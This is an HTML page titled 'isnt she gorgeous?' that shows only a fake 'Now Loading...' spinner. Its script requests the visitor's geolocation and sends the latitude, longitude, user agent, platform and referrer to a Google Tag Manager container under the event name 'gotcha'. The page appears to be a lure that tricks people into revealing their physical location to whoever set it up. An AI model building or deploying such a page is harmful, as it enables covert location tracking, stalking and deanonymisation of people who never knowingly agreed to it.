<!doctype html>
<html>

<head>
    <title>isnt she gorgeous?</title>
    <script>(function (w, d, s, l, i) {
            w[l] = w[l] || []; w[l].push({
                'gtm.start':
                    new Date().getTime(), event: 'gtm.js'
            }); var f = d.getElementsByTagName(s)[0],
                j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =
                    'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);
        })(window, document, 'script', 'dataLayer', 'GTM-TFV5BSX');</script>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        body {
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
            background-color: #f0f0f0;
            font-family: Arial, sans-serif;
        }

        .loader-container {
            text-align: center;
        }

        .loader {
            text-align: center;
            border-radius: 50%;
            width: 100px;
            height: 100px;
            animation: spin 1s linear infinite;
            margin-bottom: 10px;
            background: conic-gradient(#3498db 0% 25%,
                    #e74c3c 25% 50%,
                    #2ecc71 50% 75%,
                    #f39c12 75% 100%);
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        .loading-text {
            animation: fadeInOut 1s ease-in-out infinite;
        }

        @keyframes fadeInOut {

            0%,
            100% {
                opacity: 0;
            }

            50% {
                opacity: 1;
            }
        }
    </style>
</head>

<body>
    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TFV5BSX" height="0" width="0"
            style="display:none;visibility:hidden"></iframe></noscript>

    <div class="loader-container">
        <div class="loader"></div>
        <p class="loading-text">Now Loading...</p>
    </div>


</body>

<script>
    var latitude, longitude;
    navigator.geolocation.getCurrentPosition(function (position) {
        latitude = position.coords.latitude;
        longitude = position.coords.longitude;
        getData();
    });

    function getData() {
        var userAgent = navigator.userAgent;
        var platform = navigator.platform;
        var url = document.createElement('a');
        url.href = document.referrer;

        window.dataLayer = window.dataLayer || [];
        return window.dataLayer.push({
            'event': 'gotcha',
            'ref': url.href,
            'ua': userAgent,
            'll': latitude + '|' + longitude,
            'pl': platform
        });
    }
</script>

</html>